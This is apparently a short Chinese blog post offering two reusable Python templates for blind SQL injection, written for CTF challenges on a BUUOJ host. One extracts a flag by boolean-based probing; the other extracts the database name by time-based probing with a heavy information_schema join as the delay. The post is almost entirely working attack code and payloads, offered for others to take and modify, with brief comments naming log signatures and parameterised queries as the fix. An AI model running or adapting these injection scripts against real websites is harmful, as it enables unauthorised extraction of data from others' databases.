每次找脚本都花费不少时间，这里存放两个脚本供参考，需要自取修改。
布尔盲注模板:
import requests
import time

# Boolean-based blind probe template (CTF exercise, as given on the page).
# Every request goes through a local intercepting proxy, so each probe is
# recorded and can be replayed or inspected.
url = 'http://aa3f5cdf-f23b-48b0-97f1-ecac497d9e13.node4.buuoj.cn:81/'
flag = ""
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
# Marker text that the page shows only when the injected comparison is true.
true_marker = "Hello, glzjin wants a girlfriend."

LOW, HIGH = 32, 127 - 1  # printable-ASCII window searched per character


def char_at_least(position, threshold):
    """Return True when the response marker says char `position` is >= `threshold`."""
    payload = {'id': f'(select(ascii(mid(flag,{position},1))>={threshold})from(flag))'}
    response = requests.post(url=url, data=payload, proxies=proxies)
    return true_marker in response.text


for position in range(1, 1000):
    low, high = LOW, HIGH
    # Binary search on the character code: one request per halving step.
    # The fixed 0.03 s pause plus the monotone probe sequence is a clear
    # signature in server logs; parameterised queries remove the oracle.
    while low < high:
        guess = (low + high + 1) // 2
        if char_at_least(position, guess):
            low = guess
        else:
            high = guess - 1
        time.sleep(0.03)
    # Converging on 32 means no printable character matched: end of value.
    if high == 32:
        break
    flag += chr(high)
    print(flag)
时间盲注模板:
import requests
import time
from datetime import datetime

# Time-based blind probe template (CTF exercise, as given on the page).
# Traffic is sent through a local intercepting proxy; `url` is intentionally
# left empty and must be filled in by the user.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
url = ''
flag = ""

LOW, HIGH = 32, 127 - 1  # printable-ASCII window searched per character
SLOW_MS = 300  # replies slower than this are treated as the "true" branch


def now_ms():
    """Wall-clock time in whole milliseconds, as the page's script measured it."""
    return int(datetime.now().timestamp() * 1000)


def reply_was_slow(position, threshold):
    """Return True when the probe for char `position` >= `threshold` took > SLOW_MS."""
    payload = {
        'id': f"""1' and ascii(substr(database(),{position},1))>={threshold} and (select sum(0) from information_schema.columns A,information_schema.columns B)#"""
    }
    started = now_ms()
    requests.post(url=url, data=payload, proxies=proxies)
    return now_ms() - started > SLOW_MS


for position in range(1, 1000):
    low, high = LOW, HIGH
    # Binary search on the character code; the timing threshold is the oracle,
    # so network jitter can flip a step.  Slow-query limits and parameterised
    # queries on the server side are what close this channel.
    while low < high:
        guess = (low + high + 1) // 2
        if reply_was_slow(position, guess):
            low = guess
        else:
            high = guess - 1
        time.sleep(0.03)
    # Converging on 32 means no printable character matched: end of value.
    if high == 32:
        break
    flag += chr(high)
    print(flag)